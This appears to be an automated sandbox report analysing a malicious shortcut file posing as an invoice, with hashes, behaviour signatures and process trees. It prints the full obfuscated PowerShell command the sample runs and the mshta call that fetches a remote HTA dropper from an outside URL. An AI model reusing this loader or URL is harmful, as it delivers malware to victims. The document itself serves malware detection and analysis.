Analysis
-
max time kernel
40s -
max time network
44s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
24-05-2022 14:15
Static task
static1
Behavioral task
behavioral1
Sample
Invoice_1.lnk
Resource
win7-20220414-en
windows7_x64
0 signatures
0 seconds
General
-
Target
Invoice_1.lnk
-
Size
2KB
-
MD5
c00c67f3de031c5ae198ba0362b5dd01
-
SHA1
40f3b0263f8fccdf1fd5fe287dbd55829a8eddd6
-
SHA256
d146c8bc52ec74b67704b30c0fb20995ba65770d191502f70c88c262dc44fc5d
-
SHA512
4944aa5947667500eddb4d7fed5b0a8eb4d14db1d60496fcbe38c4032511b04c92757807a23dff49353f5ee75a5ed44cc5de9ed7cdcd12b59a7b8c9214e227ad
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://conderadio.tv/09872574.hta
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
mshta.exeflow pid process 4 1084 mshta.exe 5 1084 mshta.exe 6 1084 mshta.exe 7 1084 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1336 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1336 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 2004 wrote to memory of 1336 2004 cmd.exe powershell.exe PID 2004 wrote to memory of 1336 2004 cmd.exe powershell.exe PID 2004 wrote to memory of 1336 2004 cmd.exe powershell.exe PID 1336 wrote to memory of 1084 1336 powershell.exe mshta.exe PID 1336 wrote to memory of 1084 1336 powershell.exe mshta.exe PID 1336 wrote to memory of 1084 1336 powershell.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Invoice_1.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#oeE'}tV41O#>$zfkmQNMMGKcDTdJr=@(30802,30808,30797,30809,30790,30725,30797,30809,30809,30805,30808,30751,30740,30740,30792,30804,30803,30793,30794,30807,30790,30793,30798,30804,30739,30809,30811,30740,30741,30750,30749,30748,30743,30746,30748,30745,30739,30797,30809,30790);<#oeE'}tV41O#>$JxXPDMbtIHLsflxCnW=@(30766,30762,30781);<#oeE'}tV41O#>function najjGYpeT($gNCFLP){$KeafQvWRzpQ=30693;<#oeE'}tV41O#>$GDaRsn=$Null;foreach($jimJcuhW in $gNCFLP){$GDaRsn+=[char]($jimJcuhW-$KeafQvWRzpQ)};return $GDaRsn};sal pQtoDlBENz (najjGYpeT $JxXPDMbtIHLsflxCnW);<#oeE'}tV41O#>pQtoDlBENz((najjGYpeT $zfkmQNMMGKcDTdJr));2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://conderadio.tv/09872574.hta3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1084-97-0x0000000000000000-mapping.dmp
-
memory/1336-88-0x0000000000000000-mapping.dmp
-
memory/1336-90-0x000007FEF36C0000-0x000007FEF40E3000-memory.dmpFilesize
10.1MB
-
memory/1336-94-0x000007FEF2B60000-0x000007FEF36BD000-memory.dmpFilesize
11.4MB
-
memory/1336-95-0x0000000002334000-0x0000000002337000-memory.dmpFilesize
12KB
-
memory/1336-96-0x000000000233B000-0x000000000235A000-memory.dmpFilesize
124KB
-
memory/2004-54-0x000007FEFBA41000-0x000007FEFBA43000-memory.dmpFilesize
8KB